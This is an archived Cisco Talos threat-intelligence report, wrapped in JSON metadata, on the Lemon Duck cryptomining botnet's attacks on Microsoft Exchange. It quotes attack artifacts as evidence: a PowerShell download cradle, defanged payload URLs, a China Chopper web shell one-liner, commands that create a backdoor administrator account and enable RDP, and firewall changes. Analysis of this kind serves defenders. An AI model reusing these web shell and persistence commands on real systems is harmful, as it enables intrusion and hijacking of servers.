{
	"id": "f48d7e10-d57e-4891-b306-1006299532ce",
	"created_at": "2026-04-06T00:22:29.983116Z",
	"updated_at": "2026-04-10T13:11:58.902947Z",
	"deleted_at": null,
	"sha1_hash": "e6ba34bbe78d34c34d977f69154df54c16da9590",
	"title": "Lemon Duck spreads its wings: Actors target Microsoft Exchange servers, incorporate new TTPs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 779027,
	"plain_text": "Lemon Duck spreads its wings: Actors target Microsoft Exchange\r\nservers, incorporate new TTPs\r\nBy Caitlin Huey\r\nPublished: 2021-05-07 · Archived: 2026-04-05 17:56:46 UTC\r\nFriday, May 7, 2021 15:50\r\nBy Caitlin Huey and Andrew Windsor with contributions from Edmund Brumaghin.\r\nLemon Duck continues to refine and improve upon their tactics, techniques and procedures as they attempt\r\nto maximize the effectiveness of their campaigns.\r\nLemon Duck remains relevant as the operators begin to target Microsoft Exchange servers, exploiting high-profile security vulnerabilities to drop web shells and carry out malicious activities.\r\nLemon Duck continues to incorporate new tools, such as Cobalt Strike, into their malware toolkit.\r\nAdditional obfuscation techniques are now being used to make the infrastructure associated with these\r\ncampaigns more difficult to identify and analyze.\r\nThe use of fake domains on East Asian top-level domains (TLDs) masks connections to the actual\r\ncommand and control (C2) infrastructure used in these campaigns.\r\nExecutive summary\r\nSince April 2021, Cisco Talos has observed updated infrastructure and new components associated with the\r\nLemon Duck cryptocurrency mining botnet that target unpatched Microsoft Exchange Servers and attempt to\r\ndownload and execute payloads for Cobalt Strike DNS beacons. This activity reflects updated tactics, techniques,\r\nand procedures (TTPs) associated with this threat actor. After several zero-day Microsoft Exchange Server\r\nvulnerabilities were made public on March 2, Cisco Talos and several other security researchers began observing\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 1 of 15\n\nvarious threat actors, including Lemon Duck, leveraging these vulnerabilities for initial exploitation before\r\nsecurity patches were made available. 
Microsoft released a report on March 25 highlighting Lemon Duck's\r\ntargeting of Exchange Servers to install cryptocurrency-mining malware and a malware loader that was used to\r\ndeliver secondary malware payloads, such as information stealers. We also discovered that Lemon Duck actors\r\nhave been generating fake domains on East Asian top-level domains (TLDs) to mask connections to their\r\nlegitimate C2 domain since at least February 2020, highlighting another attempt to make their operations more\r\neffective. Below, we'll outline changes to the TTPs used by Lemon Duck across recent campaigns as they relate to\r\nvarious stages of these attacks.\r\nRecent campaigns and victimology\r\nCisco Talos researchers initially identified a notable increase in the volume of DNS queries being made for four\r\nnewly observed Lemon Duck domains:\r\nt[.]hwqloan[.]com\r\nd[.]hwqloan[.]com\r\nt[.]ouler[.]cc\r\nps2[.]jusanrihua[.]com\r\nThis spike, which occurred on April 9, 2021, coincided with infection activity\r\ncollected within our telemetry systems associated with these same domains. We observed the largest spike\r\nin queries for ps2[.]jusanrihua[.]com, which peaked on April 13, then decreased before spiking again on\r\nApril 26.\r\nSpike in DNS queries to ps2[.]jusanrihua[.]com on April 9.\r\nLooking more closely at the geographic distribution of the domain resolution requests related to this activity, we\r\nobserved that the majority of them originated from North America, followed by Europe and South East Asia, with a\r\nfew others from South America and Africa. 
This is in contrast to the query distribution observed in October 2020,\r\nas described in our previous publication, where the majority of the queries originated from Asia.\r\nGeographic distribution of queries for t[.]hwqloan[.]com as seen by Cisco Umbrella.\r\nNotably, for one of these domains, d[.]hwqloan[.]com, over sixty percent of the DNS queries originated from\r\nIndia. We determined this activity was associated with infected systems attempting to communicate with Lemon\r\nDuck infrastructure. Since the communication with these domains typically occurs during the Lemon Duck\r\ninfection process, this activity may be indicative of the geographic distribution of the victims of these campaigns.\r\nIn Talos' original coverage of Lemon Duck, we described multiple overlaps between Lemon Duck and another\r\ncryptocurrency-mining malware, Beapy (aka Pcastle), which had previously been observed targeting East Asia. At\r\nthe time, Lemon Duck infections reported by other security researchers were being observed in much higher\r\nconcentrations in China. While Lemon Duck's currently observed victimology and methods of propagation are\r\nlargely indiscriminate, the seemingly exclusive use of country code TLDs (ccTLDs) for China, Japan and South\r\nKorea in the fake domains written to the Windows hosts file is notable, as described in the section \"Command and\r\ncontrol (C2)\" below.\r\nConsidering these ccTLDs are most commonly used for websites in their respective countries and languages, it is\r\nalso interesting that they were used, rather than more generic and globally used TLDs such as \".com\" or \".net.\"\r\nThis may allow the threat actor to more effectively hide C2 communications among other web traffic present in\r\nvictim environments. 
Due to the prevalence of domains using these ccTLDs, web traffic to the domains using the\r\nccTLDs may be more easily dismissed as noise by victims within these countries. This may add another potential\r\noverlap with Beapy, as each has exhibited TTPs suggesting possible targeting of victims in East Asia. However,\r\nwithout additional evidence, this particular connection remains low confidence, although it is interesting within the\r\ncontext of the other overlaps between the two families.\r\nNotable changes to Lemon Duck TTPs\r\nTalos has observed several recent changes to the tactics, techniques and procedures used by Lemon Duck. This\r\ndemonstrates that this threat actor is continuously evolving their approach to maximize their ability to achieve\r\ntheir mission objectives. During our analysis of recent Lemon Duck campaigns, we observed that the threat actor\r\nis now leveraging new infrastructure, incorporating additional tools and functionality into their attack\r\nmethodology and workflow, and putting more emphasis on obfuscating various components used throughout the\r\ninfection process in an attempt to more effectively evade detection and analysis. Additionally, the threat actor is\r\ntargeting high-profile software vulnerabilities that may allow them to more effectively establish an initial foothold\r\nwithin victim environments. The following sections will describe these changes throughout each phase of the\r\nattack lifecycle in more detail.\r\nDelivery and initial exploitation\r\nLemon Duck features self-propagating capabilities and a modular framework that allow it to spread across\r\nnetwork connections to infect additional systems that become part of the Lemon Duck botnet and generate\r\nrevenue for threat actors by mining cryptocurrency. 
This automated exploitation of software vulnerabilities is one\r\nmechanism used by Lemon Duck to establish initial access and propagate across a network environment. Lemon\r\nDuck operators have previously employed several exploits for vulnerabilities, such as SMBGhost and\r\nEternalBlue, and appear to be implementing new exploit code and targeting additional software vulnerabilities over time\r\nto ensure that they can continue to spread malware to new hosts and maintain the size of the botnet and revenue\r\nstream being generated by compromised hosts.\r\nLemon Duck targets Microsoft Exchange\r\nTalos assesses with medium confidence that these are likely newer Lemon Duck components associated with the\r\ntargeting of Microsoft Exchange Server vulnerabilities. The vulnerabilities being targeted, which Microsoft has\r\nsince issued patches for, are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. These\r\nvulnerabilities were reported on March 2, 2021, and affect Microsoft Exchange Server versions 2013, 2016 and\r\n2019. They have been leveraged by multiple threat actors targeting Microsoft Exchange servers around the world.\r\nWhile we could not determine the exact exploitation vector used in this campaign, the actors appear to be\r\ntargeting unpatched Exchange Servers, dropping web shells and employing several techniques that are consistent\r\nwith previous reporting on post-compromise activity leveraging these vulnerabilities, as discussed in the section\r\n\"Post-Compromise Activities on Exchange Servers\" below.\r\nTypical post-compromise activities\r\nOnce a new system has been compromised by Lemon Duck, the subsequent infection process features several\r\nnotable characteristics. In many cases, compromised systems attempt to retrieve additional components and\r\nmodules from attacker-controlled web servers. We observed typical Lemon Duck download attempts in telemetry\r\ndata for files such as \"ipc.jsp\" and \"aa.jsp\" on endpoints. 
This activity was associated with previously reported\r\nLemon Duck domains, such as t[.]netcatkit[.]com and t[.]bb3u9[.]com.\r\nThese files contain PowerShell instructions that are executed by the system and are responsible for reporting\r\nsuccessful infections and collecting system information from the victim machine, such as computer name, GUID\r\nand MAC address, which is then transmitted back to the attacker.\r\nc:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe \u0026 powershell -w hidden IEX(New-Object Net.WebClient)\r\nAfter the initial beaconing and system information gathering, a base64-encoded Portable Executable (PE) file\r\n(6be5847c5b80be8858e1ff0ece401851886428b1f22444212250133d49b5ee30) was retrieved from the following\r\nURL:\r\nhxxp[:]//t[.]hwqloan[.]com/t.txt\r\nOnce decoded, the PE executed multiple commands using the Windows Management Instrumentation (WMI)\r\ncommand \"wmic.exe\" to uninstall AV/security products, such as ESET and Kaspersky. It also stopped and\r\nremoved various security-related services, such as the Windows Update feature, wuauserv, and Windows\r\nDefender. Some examples of this removal activity can be seen in the screenshot below.\r\nWMIC removing AV products.\r\nWhile analyzing the PE, we observed the execution of a PowerShell script that downloaded and executed an\r\nadditional malware payload, \"syspstem.dat\", from hxxp[:]//d[.]hwqloan[.]com, a newly observed subdomain for\r\nhwqloan[.]com. This payload was a Python executable file and likely related to the Python-based module\r\ndescribed in our previous publication. It includes the \"killer\" module which contains a hardcoded list of service\r\nnames that Lemon Duck uses to disable competing cryptocurrency miners. 
Once downloaded, it is saved to the\r\nAppData\\Local\\Temp\\ directory, where a subsequent PowerShell script checks to determine if the MD5 hash value\r\nof the file matches a hard-coded value. Assuming the check passes, it then creates a scheduled task called\r\n\"syspstem\" and configures it to execute every 50 minutes, as seen below.\r\n\"syspstem\" scheduled task creation.\r\nThe PE file then makes an HTTP GET request to download a remote resource from\r\nhxxp[:]//ps2[.]jusanrihua[.]com/ps, which, at the time of analysis, appeared to be down and/or unavailable,\r\nresulting in download failure.\r\nConsistent with previous Lemon Duck campaigns, we observed the use of native Windows command-line utilities\r\nand living-off-the-land binaries or \"LoLBins\" to carry out various tasks throughout the infection process. Several\r\nscheduled tasks were also created for various purposes including achieving persistence across system reboots.\r\nIn more recent campaigns, we have observed several notable changes to the infection process. The threat actor is\r\nnow leveraging CertUtil to download and execute two new malicious PowerShell scripts, \"dns\" and \"shell.txt,\"\r\nwhich are retrieved from an attacker-controlled web server (hxxp[:]//t[.]hwqloan[.]com), and saved as \"dn.ps1\"\r\nand \"c.ps1,\" respectively.\r\nThe PowerShell script \"dn.ps1\" attempts to uninstall multiple AV products, similar to what was previously\r\ndescribed, and configures a scheduled task that will execute a subsequent PowerShell script. It also establishes\r\npersistence routines that attempt to download and execute content retrieved from each of the following URLs:\r\nhxxp[:]//t[.]hwqloan[.]com/dns\r\nhxxp[:]//t[.]ouler[.]cc/dns\r\nhxxp[:]//ps2[.]jusanrihua[.]com/dns\r\nMost notably, the URL hxxp[:]//ps2[.]jusanrihua[.]com/dns is used to\r\nretrieve a Cobalt Strike payload. 
This is a new evolution in Lemon Duck's toolset. For details related to the\r\nCobalt Strike payload and how it is being leveraged in Lemon Duck campaigns, refer to the section\r\n\"Command and Control (C2).\"\r\nThe PowerShell script \"c.ps1\" contains several CertUtil commands that are used to download additional payloads,\r\nsuch as a variant of the XMRig cryptocurrency miner \"m6.exe,\" which Lemon Duck has used in the past. This\r\nactivity is also consistent with activity that was previously reported here.\r\nBased on analysis of system activities associated with these campaigns, additional post-compromise discovery and\r\ntargeting activities may be conducted as described in the section \"Exchange Server Reconnaissance and\r\nDiscovery.\" Following execution of the cryptocurrency mining payload, the PowerShell script is responsible for\r\ncleaning up various artifacts and removing indicators of compromise, such as the aforementioned \"dn.ps1\" and\r\n\"c.ps1\" from the infected system.\r\nThe \"netsh.exe\" Windows command is also used to disable Windows Firewall settings, enable port forwarding,\r\nand redirect traffic to 1[.]1[.]1[.]1[:]53 from port 65529/TCP. As described in previous Lemon Duck reporting, the\r\nmalware uses port 65529 as an indicator to identify if systems have already been compromised, and thus avoid\r\nreusing the exploitation modules on them if it is not necessary.\r\nPost-compromise activities targeting Exchange servers\r\nWhile analyzing telemetry related to ongoing Lemon Duck campaigns, we identified malicious activity being\r\nconducted on endpoints whose host names indicated they may be mail servers running Microsoft Exchange. This\r\nelevated our level of confidence that they may have been compromised by exploitation attempts targeting the\r\npreviously described Microsoft Exchange vulnerabilities, with variants of known web shells being uploaded\r\nfollowing successful system compromise. 
The following section describes malicious activity that was detected on\r\nthese systems that may indicate that the adversaries are now showing specific interest in compromising Microsoft\r\nExchange servers and leveraging them for nefarious purposes.\r\nExchange Server directory creation\r\nWhile analyzing the malicious activity detected on compromised systems suspected to be Exchange servers, we\r\nidentified the execution of interesting system commands using the Windows Control Manager (sc.exe). This\r\nnative Windows executable was used to set descriptions for services, configure services, and start services on\r\ncompromised systems. An example of this can be seen below:\r\n\"sc.exe\" used to configure and start services on compromised systems.\r\nInterestingly, the DisplayName used in this case contained the value \"Microsofts\" and appeared to be a reference\r\nto the \"Windows Defender Antivirus Network Inspection Service,\" which according to this description of the\r\nservice (WdNisSvc), \"helps guard against intrusion attempts targeting known and newly discovered vulnerabilities\r\nin network protocols.\"\r\nWe also observed the creation of various directories within the IIS web directory on infected systems. 
An example\r\nof this can be seen below.\r\nmd C:\\inetpub\\wwwroot\\aspnet_client\\js\\demo\r\nThe creation and use of this directory structure is consistent with previous reporting on various TTPs related to\r\nsuccessful attacks against Exchange servers leveraging the vulnerabilities described earlier in the section \"Lemon\r\nDuck targets Microsoft Exchange.\"\r\nThe adversary also copied several files into it, including two .ASPX files named \"wanlins.aspx\" and\r\n\"wanlin.aspx.\" These files are likely web shells and were copied from C:\\inetpub\\wwwroot\\aspnet_client\\, a\r\nknown directory where a majority of the web shells were initially observed following Microsoft's release of details\r\nrelated to Hafnium activity. An example of this can be seen below.\r\ncopy C:\\inetpub\\wwwroot\\aspnet_client\\wanlin.aspx C:\\inetpub\\wwwroot\\aspnet_client\\js\\demo\\wanlins.aspx\r\nThis newly created directory appears to be the actor's working environment (\\js\\demo), and was likely used by the\r\nactor to stage files early in the post-compromise phase of the attack. In late March 2021, it was reported here that\r\na file with the name \"wanlin.aspx\" was observed as part of a large number of web shell probing requests that were\r\nbelieved to be part of scanning activity conducted by security vendors and research organizations. 
These same file\r\nnames were also identified by security researchers as being associated with various web shells that were identified\r\nnearly a month after Microsoft's initial publication related to threat actors' exploitation of these Exchange\r\nvulnerabilities.\r\nThe Windows \"attrib\" command was also used to set the Archive file attribute, System file attribute, Read-only\r\nattribute, and the Hidden file attribute on the previously created files and directories, likely as a way to obfuscate\r\nthe actor's activities on the system.\r\nModifying file attributes with the \"attrib\" command.\r\nNext, we observed the echo command being used to write code associated with a web shell into the previously\r\ncreated ASPX files. In this case, several characteristics matched portions of code associated with known China\r\nChopper variants identified days after the Exchange Server vulnerabilities were publicized. An example of this can\r\nbe seen below.\r\necho '\u003cscript language=\"JScript\" runat=\"server) function Page_Load(){/**/eval(Request[\"code\"],\"unsafe\");}\u003c/scri\r\nThe 'runat=server' attribute causes the script to be processed server-side instead of client-side, while JScript is\r\nspecified as the language used for the script block. Researchers have previously noted many variations in the\r\nChina Chopper web shells dropped in attacks exploiting the Exchange vulnerabilities before security patches were\r\nissued. This further highlights that we will likely continue to see a variety of TTPs associated with this activity as\r\nan increasing number of actors incorporate these CVEs into their attacks.\r\nAnother Lemon Duck sample within our telemetry data was detected during the same timeframe and also\r\nattempted to create an additional Exchange-specific directory structure on infected systems. 
This new directory\r\nwas located at the following filesystem path:\r\nE:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\js\\demo\r\nWhile we did not observe .ASPX files copied into this directory location on the system where this activity was\r\ndetected, this clearly demonstrates specific interest in operating on and the targeting of Microsoft Exchange\r\nservers by the threat actor.\r\nExchange Server reconnaissance and discovery\r\nWe also observed post-compromise activities consistent with previous reporting on additional reconnaissance and\r\ndiscovery conducted following successful exploitation of the Microsoft Exchange vulnerabilities described earlier\r\nin this post.\r\nThe built-in \"net\" and \"net1\" command-line utilities were used to create new user accounts with local\r\nadministrator privileges on systems and modify local group membership. We observed the command \"net user\"\r\nbeing used to create a new user with the alias \"netcat\" and a designated password, followed by several attempts to\r\ninvoke \"net localgroup\" to add this newly created user to the following local security groups: administrators,\r\nAdministrateurs, Remote Desktop Users and Enterprise Admins.\r\n\"net\" commands are used to add users and modify local groups.\r\nWe also observed \"net1\" commands with the following syntax:\r\nC:\\Windows\\system32\\net1 user netcat qweqwe$123 /add\r\nCreating a new user and adding it to local groups may be an attempt to obfuscate and/or minimize evidence of\r\nsuspicious activities. 
One of these groups, Administrateurs, may suggest that a language preference was used to\r\nmore broadly target additional systems in order to query and add groups on those systems.\r\nWMI commands were also leveraged to modify the registry and enable Remote Desktop Protocol (RDP) using the\r\nfollowing syntax:\r\nREG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000\r\nThis registry modification is consistent with post-exploitation activities previously reported by Microsoft in their\r\nreport related to successful exploitation campaigns against Exchange Servers leveraging the same Exchange\r\nvulnerabilities. At this point, a typical Lemon Duck infection chain follows, similar to what was described earlier\r\nin the section \"Typical Post-Compromise Activities.\"\r\nRecent Lemon Duck activity suggests that the operators are continuing to update portions of their attack to remain\r\nviable as they incorporate new TTPs and begin targeting new high-profile security vulnerabilities. Some examples\r\nof suspicious activities we observed throughout recent Lemon Duck campaigns include the following:\r\nCreation of various Exchange-specific directory structures within the IIS web directory on compromised\r\nsystems.\r\nCopying of .ASPX files associated with these web shells into the recently created Exchange-specific\r\ndirectory structure.\r\nPost-compromise activity including the creation of new users and modification of local group membership\r\nusing the \"net\" and \"net1\" commands.\r\nModification of the Windows registry to enable RDP access to the system.\r\nAs the number of distinct threat\r\ngroups incorporating these exploits into their attacks continues to increase, we're likely to see varying\r\ntechniques associated with this activity. 
We recommend checking for the aforementioned activity as\r\npotential evidence of compromise.\r\nCommand and control (C2)\r\nCobalt Strike DNS beacons\r\nLemon Duck was also observed leveraging Cobalt Strike payloads during recent campaigns, representing an\r\nevolution in the toolset used by this threat actor and demonstrating that they continue to refine their approach to\r\nthe attack lifecycle over time as they identify opportunities to increase their efficiency as well as the effectiveness\r\nof their attacks. While analyzing Lemon Duck infection activity, we observed PowerShell being used to download\r\nand execute a Cobalt Strike payload that was retrieved from the following URL:\r\nhxxp[:]//ps2[.]jusanrihua[.]com/dns\r\nThis payload was configured as a Windows DNS beacon and attempts to communicate with the C2 server\r\n(1f0834b2[.]ps2[.]jusanrihua[.]com) using a DNS-based covert channel. The beacon then communicates with this\r\nspecific subdomain to transmit encoded data via DNS A record query requests. An example of this activity can be\r\nseen in the screenshot below.\r\nWireshark showing DNS requests to 1f0834b2[.]ps2[.]jusanrihua[.]com.\r\nThis represents a new TTP for Lemon Duck, and is another example of their reliance on offensive security tools\r\n(OSTs), including Powersploit's reflective loader and a modified Mimikatz, which are already included as\r\nadditional modules and components of Lemon Duck and used throughout the typical attack lifecycle.\r\nDecoy domain generation\r\nAnother previously unreported TTP we have observed is Lemon Duck's use of a new technique to obfuscate their\r\nC2 domain(s). This technique appears to have been used by Lemon Duck since at least February 2020, according\r\nto our telemetry data. 
During the Lemon Duck infection process, PowerShell is used to invoke the\r\n\"GetHostAddresses\" method from the .NET runtime class \"Net.Dns\" to obtain the current IP address for an\r\nattacker-controlled domain. For example, during our analysis, we observed the following domains being used for\r\nthis purpose.\r\nt[.]awcna[.]com\r\nt[.]tr2q[.]com\r\nt[.]amxny[.]com\r\nThis IP address is combined with a fake hostname hardcoded into the PowerShell\r\ncommand and written as an entry to the Windows hosts file located at\r\nc:\\windows\\system32\\drivers\\etc\\hosts.\r\nThis mechanism allows name resolution to continue even if DNS-based security controls are later deployed, as the\r\ntranslation is now recorded locally and future resolution requests no longer rely upon upstream infrastructure such\r\nas DNS servers. This may allow the adversary to achieve longer term persistence once operational in victim\r\nenvironments. The domain information written to the hosts file varied across each Lemon Duck infection we\r\nanalyzed.\r\nThese values are stored as string literals within the intermediate PowerShell invocation. Since the PowerShell\r\ncode itself does not generate these string values, they are likely generated within the initial Lemon Duck PE as the\r\nPowerShell script itself is constructed or may be included statically within the files used for intermediate stage\r\nexecution hosted on the C2 servers. The decoy domain composition does not appear to be derived from dictionary\r\nwords or combinations. Character case varies significantly, as does the use of numerals interspersed with ASCII\r\nLatin characters. 
There are also slight variations in length, although the generated domains in the samples we\r\nanalyzed do not have a length greater than ten alphanumeric characters, not including the top level domain (TLD).\r\nAll of the TLDs used are East Asian country code TLDs including .cn, .kr and .jp. While this activity dates back\r\nalmost a year, this particular technique has likely supported Lemon Duck's continued persistence throughout its\r\nlengthy campaign.\r\nOther cryptocurrency-mining botnets targeting Exchange vulnerabilities\r\nTalos began to observe domains linked to Lemon Duck and another cryptocurrency miner, DLTMiner, as\r\ninfrastructure used in post-exploitation activity that targeted the Microsoft Exchange zero-days in early March\r\n2021. Other security firms have also detailed the actions of DLTMiner. We also identified activity that was\r\npublished very recently related to some of the components mentioned above (c.ps1, dns.ps1, m6.exe) that were\r\nobserved on compromised systems where ransomware was also deployed. At this time, there doesn't appear to be a\r\nlink between the Lemon Duck components observed there and the reported ransomware (TeslaRVNG2). This\r\nsuggests that given the nature of the vulnerabilities targeted, we are likely to continue to observe a range of\r\nmalicious activities in parallel, using similar exploitation techniques and infection vectors to compromise systems.\r\nIn some cases, attackers may take advantage of artifacts left in place from prior compromises, making distinction\r\nmore difficult.\r\nOpen-source research indicates that additional cryptocurrency mining malware variants have been leveraging\r\nvulnerable Exchange Servers as an initial exploitation vector for their operations. 
For example, in late April 2021,\r\nanother cryptocurrency mining botnet, Prometei, was reported to be exploiting two of the aforementioned\r\nExchange Server vulnerabilities (CVE-2021-27065 and CVE-2021-26858) which allowed the attackers to achieve\r\nremote code execution on the host. The attackers then installed and executed a variant of the China Chopper web\r\nshell, among other custom and native Windows utilities. Due to the increasing number of actors incorporating\r\nthese CVEs into their attacks, we will likely continue to see a variety of TTPs associated with this activity going\r\nforward.\r\nConclusion\r\nLemon Duck continues to launch campaigns against systems around the world, attempting to leverage infected\r\nsystems to mine cryptocurrency and generate revenue for the adversary behind this botnet. The use of new tools\r\nlike Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack\r\nlifecycle, may enable them to operate more effectively for longer periods within victim environments. New TTPs\r\nconsistent with those reportedly related to widespread exploitation of high-profile Microsoft Exchange software\r\nvulnerabilities, and additional host-based evidence suggest that this threat actor is also now showing a specific\r\ninterest in targeting Exchange Servers as they attempt to compromise additional systems and maintain and/or\r\nincrease the number of systems within the Lemon Duck botnet. Organizations should remain vigilant against this\r\nthreat, as it will likely continue to evolve.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint is ideally suited to prevent the execution of the malware detailed in this post. 
New users\r\ncan try Cisco Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Firewall and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics helps identify malicious binaries and build protection into all Cisco Security\r\nproducts.\r\nCisco Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and\r\nURLs, whether users are on or off the corporate network.\r\nAdditional protections with context to your specific environment and threat data are available from the Cisco\r\nSecure Firewall Management Center.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org. The following SIDs have been released to detect this threat: 45549:4, 46237,\r\n50795, 55926, 57469 - 57474.\r\nThe following ClamAV signatures have been released to detect this threat as well as tools and malware related to\r\nthese campaigns:\r\nPs1.Trojan.Lemonduck-9856143\r\nPs1.Trojan.Lemonduck-9856144\r\nWin.Trojan.CobaltStrike-7917400\r\nWin.Trojan.CobaltStrike-8091534\r\nThe following Cisco Secure Endpoint Cloud IOCs have been released to\r\ndetect this threat on endpoints:\r\nW32.LemonDuckCryptoMiner.ioc\r\nClam.Ps1.Dropper.LemonDuck-9775016-1\r\nWin.Miner.LemonDuck.tii.Talos\r\nPs1.Dropper.LemonDuck\r\nClam.Js.Malware.LemonDuck-9775029-1\r\nATT\u0026CK Technique Mapping\r\nThe following ATT\u0026CK techniques have been observed across the Lemon Duck campaigns described in this blog\r\npost.\r\nIndicators of Compromise (IOCs)\r\nThe following indicators of compromise have been observed as being associated with 
these malware campaigns.\r\nHashes\r\nThe following file hashes (SHA256) have been observed as being associated with these\r\nmalware campaigns.\r\nURLs\r\nThe following URLs have been observed as being associated with these malware\r\ncampaigns.\r\nDomains\r\nThe following domains have been observed in the activity discussed 
above.\r\naeon-pool.sqlnetcat[.]com\r\napis.890[.]la\r\nwakuang.eatuo[.]com\r\nThe following domains have been observed as being generated using the Domain Generation Algorithm (DGA)\r\ndescribed in this blog post.\r\nSource: https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html"
	],
	"report_names": [
		"lemon-duck-spreads-wings.html"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7c969685-459b-4c93-a788-74108eab6f47",
			"created_at": "2023-01-06T13:46:39.189751Z",
			"updated_at": "2026-04-10T02:00:03.241102Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"Red Dev 13",
				"Silk Typhoon",
				"MURKY PANDA",
				"ATK233",
				"G0125",
				"Operation Exchange Marauder"
			],
			"source_name": "MISPGALAXY:HAFNIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2704d770-43b4-4bc4-8a5a-05df87416848",
			"created_at": "2022-10-25T15:50:23.306305Z",
			"updated_at": "2026-04-10T02:00:05.296581Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"HAFNIUM",
				"Operation Exchange Marauder",
				"Silk Typhoon"
			],
			"source_name": "MITRE:HAFNIUM",
			"tools": [
				"Tarrask",
				"ASPXSpy",
				"Impacket",
				"PsExec",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "529c1ae9-4579-4245-86a6-20f4563a695d",
			"created_at": "2022-10-25T16:07:23.702006Z",
			"updated_at": "2026-04-10T02:00:04.71708Z",
			"deleted_at": null,
			"main_name": "Hafnium",
			"aliases": [
				"G0125",
				"Murky Panda",
				"Red Dev 13",
				"Silk Typhoon"
			],
			"source_name": "ETDA:Hafnium",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434949,
	"ts_updated_at": 1775826718,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e6ba34bbe78d34c34d977f69154df54c16da9590.pdf",
		"text": "https://archive.orkl.eu/e6ba34bbe78d34c34d977f69154df54c16da9590.txt",
		"img": "https://archive.orkl.eu/e6ba34bbe78d34c34d977f69154df54c16da9590.jpg"
	}
}